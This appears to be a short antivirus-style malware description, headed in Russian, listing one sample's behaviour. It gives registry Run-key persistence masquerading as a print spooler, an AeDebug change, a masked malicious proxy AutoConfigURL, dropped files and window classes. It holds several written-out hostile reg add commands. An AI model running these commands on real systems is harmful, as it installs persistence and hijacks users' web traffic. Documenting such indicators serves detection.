Техническая информация
- [<HKCU>\Software\Microsoft\Windows\CurrentVersion\Run] 'Spooler de Impressгo' = '%HOMEPATH%\services.exe'
- '<SYSTEM32>\reg.exe' add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AeDebug" /v "Auto" /t REG_MULTI_SZ /d 0 /f
- '<SYSTEM32>\cmd.exe' /c reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v AutoConfigURL /t REG_MULTI_SZ /d http://www.in####airports.com/include/.go/.txt.txt /f
- '<SYSTEM32>\reg.exe' add "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v AutoConfigURL /t REG_MULTI_SZ /d http://www.in####airports.com/include/.go/.txt.txt /f
- '<SYSTEM32>\cmd.exe' /c reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Spooler de Impressгo" /t REG_MULTI_SZ /d "%HOMEPATH%"\services.exe /f
- '<SYSTEM32>\cmd.exe' /c reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AeDebug" /v "Auto" /t REG_MULTI_SZ /d 0 /f
- '<SYSTEM32>\reg.exe' add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Spooler de Impressгo" /t REG_MULTI_SZ /d "%HOMEPATH%"\services.exe /f
- %HOMEPATH%\services.exe
- %HOMEPATH%\wininet.txt
- 'localhost':1037
- ClassName: 'MS_WebcheckMonitor' WindowName: ''
- ClassName: 'MS_AutodialMonitor' WindowName: ''